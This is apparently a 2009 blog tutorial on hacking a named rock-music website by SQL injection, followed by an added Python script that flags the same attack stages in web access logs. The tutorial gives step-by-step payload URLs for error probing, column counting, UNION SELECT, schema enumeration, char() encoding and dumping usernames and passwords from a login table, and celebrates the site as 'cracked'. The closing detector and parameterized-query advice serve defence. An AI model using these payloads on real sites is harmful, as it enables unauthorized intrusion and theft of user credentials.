
Published on May 14th, 2009


SQL Injection




Today I will be showing you how to hack a website using SQL injection.
The site we will be hacking today is a rock site, let's see, shall we:

http://www.rockforlife.org/article.php?id=10253

Now let's see if this is vuln. to SQL injection, so we add a ' at the end like this:

http://www.rockforlife.org/article.php?id=10253'

If you see this SQL error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

that means yes, it is vuln. to SQL injection, and now we can go to the next step.

We need to see how many columns this page has, so we do this:

http://www.rockforlife.org/article.php?id=10253 order by 1

Now we keep changing the number until we get an error, so let's try a few:

http://www.rockforlife.org/article.php?id=10253 order by 10

No error.

http://www.rockforlife.org/article.php?id=10253 order by 15

Yes, it gave an error. It gave us this error:

Unknown column '15' in 'order clause'

This means the page has 14 columns, so now we can move on.
Now we want to select all the columns to see which column is vuln. to SQL, like this:

http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--

Now you should see some number(s) on the page. In our case we got 2 and 5, which means column 2 and column 5 are vuln. to SQL.
So now let's see which MySQL version this site uses, and since we have two vuln. columns we can use either one of them.
I will use column number 2, like this:

http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14--

The @@version lets us see what version of MySQL is running, and since column number 2 is vuln. we can inject SQL commands through it.
So now let's go to the next step:

MySQL 5 has the information schema, and that saves us a lot of work, because in version 4 we had to search for the columns and other stuff,
while in version 5 the information schema tells us everything that we need. So we inject this code into the site to see all the database(s)
that the site has:

http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.schemata

As you can see, we got all of the databases. Let's continue:
now we want the main database and its tables, so we do this:

http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

Yaaay, you see all that? 😛 All we need is the table that is called login =D so we do this:

http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=login

And this will give us an error. Have no worries, all we need to do is encode the table name with char() like so:

http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=char(108,111,103,105,110)

and BAAAM!!! you see that baby ?!!

So now we want the id, user, pass, user_id and password, so let's get them, shall we? Like this:

http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14 from login

Congratz site h4x3d and cracked WHO SAID YOU CANT KILL ROCK ?!?! we just did 😉
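
For anyone defending a site like this one, here is an added example (not part of the original post) that tags web access log lines with the stage of the walkthrough above they correspond to. The log lines, IP addresses and the `classify` and `scan` names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Stages of the walkthrough above, most specific first (later stages also
# contain UNION SELECT, so order matters). Patterns run on the decoded query.
STAGES = [
    ("schema_enumeration", re.compile(r"information_schema\.(schemata|tables|columns)")),
    ("version_probe", re.compile(r"@@version")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+\b")),
    ("quote_probe", re.compile(r"=-?\d+'(&|$)")),
]
# Combined-log-format prefix: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return the stage name for a request target, or None if nothing matches."""
    query = unquote_plus(urlsplit(target).query).lower()
    query = re.sub(r"\s+", " ", query)  # collapse runs of whitespace
    for name, pattern in STAGES:
        if pattern.search(query):
            return name
    return None

def scan(lines):
    """Map client IP -> ordered list of distinct stages seen from that client."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        stage = classify(target)
        if stage and stage not in hits.setdefault(client, []):
            hits[client].append(stage)
    return hits

# Constructed sample lines (documentation IP ranges, shortened column lists).
SAMPLE_LOG = [
    '198.51.100.20 - - [14/May/2009:01:20:00 +0000] "GET /article.php?id=10253 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/May/2009:01:20:02 +0000] "GET /article.php?id=10253%27 HTTP/1.1" 200 312',
    '203.0.113.7 - - [14/May/2009:01:20:09 +0000] "GET /article.php?id=10253+order+by+15 HTTP/1.1" 200 298',
    '203.0.113.7 - - [14/May/2009:01:20:15 +0000] "GET /article.php?id=-10253+UNION+ALL+SELECT+1,2,3-- HTTP/1.1" 200 4100',
    '203.0.113.7 - - [14/May/2009:01:20:21 +0000] "GET /article.php?id=-10253+UNION+ALL+SELECT+1,@@version,3-- HTTP/1.1" 200 4105',
    '203.0.113.7 - - [14/May/2009:01:20:30 +0000] "GET /article.php?id=-10253+UNION+ALL+SELECT+1,group_concat(table_name),3+from+information_schema.tables HTTP/1.1" 200 4300',
]

if __name__ == "__main__":
    for client, stages in scan(SAMPLE_LOG).items():
        print(client, "->", ", ".join(stages))
```

A match is a signal to investigate, not a fix: the flaw itself goes away when `id` is bound through a parameterized query, and database error messages should not be shown to visitors.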


2009-05-14 01:32:04
